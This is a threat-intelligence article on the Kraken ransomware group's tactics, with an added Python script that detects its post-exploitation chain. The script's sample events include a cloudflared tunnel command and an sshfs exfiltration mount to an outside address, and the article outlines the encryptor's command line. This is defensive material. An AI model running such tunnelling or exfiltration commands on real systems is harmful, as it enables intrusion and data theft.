In August 2025, a new ransomware threat emerged with capabilities that fundamentally changed how organizations should approach enterprise security.
Kraken, a Russian-speaking cybercriminal group, began executing sophisticated attacks targeting large organizations across multiple continents.
What makes Kraken particularly dangerous is its ability to attack Windows, Linux, and VMware ESXi systems with platform-specific tools, making it one of the first truly cross-platform ransomware threats to gain widespread notoriety in enterprise circles.
The Kraken group appears to be connected to the HelloKitty ransomware operation, with security researchers suspecting the group emerged from the remnants of that previous criminal organization.
This connection becomes evident through shared ransom note filenames and explicit references on the group’s leak site.
In September 2025, Kraken announced a new underground forum called “The Last Haven Board,” designed to create a secure communication hub for the cybercriminal community.
Notably, HelloKitty operators announced their support for this new platform, solidifying the link between these groups.
Cisco Talos security analysts identified Kraken conducting double-extortion attacks in which victims are both encrypted and threatened with data publication.
The group employs a sophisticated multi-stage attack methodology that begins with SMB vulnerability exploitation on internet-exposed servers.
Once inside a system, the attackers steal privileged credentials and use them to maintain persistent access over Remote Desktop Protocol (RDP) connections.
To establish a long-term presence, they deploy Cloudflared to create reverse tunnels and use SSHFS (SSH Filesystem) for data exfiltration.
Before deploying encryption, the ransomware performs a unique benchmarking operation to measure how fast it can operate on the victim’s machine without causing immediate detection through system resource exhaustion.
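The post-exploitation chain described above (RDP access with stolen credentials, a Cloudflared reverse tunnel, and SSHFS for exfiltration) is easier to catch as a combination than as individual events, since each tool on its own has legitimate administrative uses. The following is an added example, not code from the article or from Cisco Talos, showing one way a detection engineer might correlate those indicators per host. It assumes telemetry has already been normalized into simple dicts (an `rdp_logon` kind from the Windows Security log and a `process` kind from process-creation events), and the internal address ranges, indicator weights and sample events are all constructed for illustration.

```python
"""Per-host correlation of the Kraken-style post-exploitation indicators.

Assumed input format (not from the original article): each event is a dict
with a "host" and a "kind" of either "rdp_logon" (src_ip, user) or
"process" (image, cmdline).
"""
import ipaddress
import os
from collections import defaultdict

# Assumed internal ranges for the monitored estate; anything else is treated
# as an external source for an RDP logon.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed weights: the tunnelling and exfiltration tools carry more weight
# than an RDP logon because they are rarer on ordinary servers.
INDICATORS = {
    "rdp_from_external": 2,
    "cloudflared_tunnel": 3,
    "sshfs_mount": 3,
}

# Constructed sample telemetry (not real data). fs01 shows the full chain;
# web02 shows an internal RDP logon and a benign process, which must not alert.
SAMPLE_EVENTS = [
    {"host": "fs01", "kind": "rdp_logon", "src_ip": "203.0.113.7", "user": "svc_backup"},
    {"host": "fs01", "kind": "process", "image": "/tmp/cloudflared",
     "cmdline": "cloudflared tunnel --url tcp://localhost:3389"},
    {"host": "fs01", "kind": "process", "image": "/usr/bin/sshfs",
     "cmdline": "sshfs user@198.51.100.20:/staging /mnt/out -o reconnect"},
    {"host": "web02", "kind": "rdp_logon", "src_ip": "10.0.0.5", "user": "admin"},
    {"host": "web02", "kind": "process", "image": "/usr/bin/vim", "cmdline": "vim /etc/hosts"},
]


def is_external(ip: str) -> bool:
    """True when the address is outside the configured internal ranges."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def classify(event: dict):
    """Map one event to an indicator name, or None if it matches nothing."""
    if event["kind"] == "rdp_logon":
        return "rdp_from_external" if is_external(event["src_ip"]) else None
    if event["kind"] == "process":
        cmd = event["cmdline"].lower()
        first = os.path.basename(cmd.split()[0]) if cmd.split() else ""
        # Cloudflared creating a tunnel: the behaviour the article attributes to the actor.
        if "cloudflared" in cmd and "tunnel" in cmd:
            return "cloudflared_tunnel"
        # SSHFS mounting a remote filesystem, used here as the exfiltration channel.
        if first.startswith("sshfs"):
            return "sshfs_mount"
    return None


def correlate(events, threshold: int = 5) -> dict:
    """Group indicators by host and return hosts whose summed weight meets the threshold.

    Each indicator counts once per host, so repeated logons do not inflate the score.
    """
    per_host = defaultdict(set)
    for ev in events:
        name = classify(ev)
        if name:
            per_host[ev["host"]].add(name)
    alerts = {}
    for host, names in per_host.items():
        score = sum(INDICATORS[n] for n in names)
        if score >= threshold:
            alerts[host] = {"score": score, "indicators": sorted(names)}
    return alerts


if __name__ == "__main__":
    for host, info in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: score={info['score']} indicators={', '.join(info['indicators'])}")
```

With the threshold at 5, a single Cloudflared tunnel on a host where an administrator legitimately uses it does not alert on its own; it needs either the external RDP logon or the SSHFS mount alongside it. Tuning the weights and the internal ranges to the environment is the part that makes a rule like this usable rather than noisy.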
Encryption and Command-Line Flexibility
Kraken’s technical sophistication becomes apparent through its extensive command-line options. The ransomware uses RSA-4096 and ChaCha20 encryption algorithms, providing strong cryptographic protection.
Attackers can customize attacks using parameters like timeout delays, file size limits, and encryption depth selections.
On Windows, the command takes the form: Encryptor.exe -key <32-byte key> -path .
Linux and ESXi versions use ELF binaries with options like daemon mode execution and SSH remote capabilities.
The ransomware features partial and full encryption modes, allowing attackers to optimize between encryption speed and maximum damage.
Notably, Kraken actively encrypts SQL databases and network shares while automatically skipping critical system files and Program Files directories to maintain victim system functionality for ransom negotiations.
